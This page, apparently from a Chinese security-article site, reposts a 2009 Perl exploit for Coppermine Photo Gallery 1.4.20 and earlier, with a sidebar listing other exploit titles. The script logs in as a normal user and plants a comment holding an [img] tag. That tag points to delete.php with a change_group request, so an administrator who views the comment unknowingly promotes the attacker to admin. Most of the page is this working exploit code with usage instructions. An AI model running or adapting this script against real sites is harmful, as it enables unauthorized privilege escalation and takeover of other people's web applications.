Coppermine Photo Gallery <= 1.4.20 (IMG) Privilege Escalation Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Coppermine Photo Gallery <= 1.4.20 (IMG) Privilege Escalation Exploit

来源：inphex0 at gmail dot com 作者：inphex 发布时间：2009-02-27

#!/usr/bin/perl
#inphex - inphex0 at gmail dot com
#based on http://milw0rm.com/exploits/8114 - found by StAkeR
#In case this does not work check out pos(Line 80) and find another value for it
use IO::Socket;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;
$_1 = shift; #[HOST]
$h = ($_1 eq ""?($n = 0):($n = 1));
$_2 = shift; #[PATH]
$_3 = shift; #[ID]
$_4 = shift; #[ALBUMNUM]
$_5 = shift; #[USER]
$_6 = shift; #[PASS]
$d_p = 80;
if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n";
print "perl coppermine host.com /path/ 3 2 inphex 123456";
exit;
}
if ($h) {
$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[-]ERROR");
print $socket "GET $_2 HTTP/1.1\n";
    print $socket "Host: $_1\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";

while ($answer = <$socket>) {
$f_answer = $f_answer.$answer;
}
$url = &gen_url($_1,$_2,$_3);
if ($url) {
$code = &gen_code($url);
$res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
}

}

sub gen_url($$$) {
$h = shift;
$p = shift;
$i = shift;
$url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no";
return $url;
}
sub gen_code($) {
$url = shift;
$code = "yoyoyo[img]".$url."[/img]";
return $code;
}
sub _send($$$$$$$) {
$h = "http://".shift;
$p = shift;
$i = shift;
$aid = shift;
$co = shift;
$u = shift;
$pass = shift;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );

$login = $xpl->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
if($cookie_jar->as_string) {
$c = 1;
print "[+]Connected\n";
print "[+]Logged in\n";
}else {
$c = 0;
}

if ($c) {
$con = get("".$h.$p."displayimage.php?album=".$aid."&pos=0"); #pos may be changed
if ($con =~m/addfav\.php\?pid=(.*?)\&amp/) {
$p_id = $1;

}

}

$se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data',
Content => [
'msg_author' => $u,
'msg_body' => $co,
'event' => 'comment',
'pid' => $p_id,
'submit' => "OK",
],);
print "[+]Comment sent\n";
print "[/]Waiting for admin to view\n";
$| = 0;
while (1) {
sleep(20);
syswrite STDOUT,"-";
    $xpl1 = LWP::UserAgent->new() or die;
    $cookie_jar1 = HTTP::Cookies->new();
    $xpl1->cookie_jar( $cookie_jar1 );
$_con = get("".$h.$p."logout.php?referer=index.php");
$login = $xpl1->post($h.$p.'login.php?referer=index.php',
    Content => [
    "username" => $u,
    "password" => $pass,
    "submitted" => "Login",
],);

$const = $xpl1->get($h.$p."index.php");
if ($const->as_string =~m/Config/) {
print "\n[+]You just gained Admin Privileges";
exit;
}
}
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告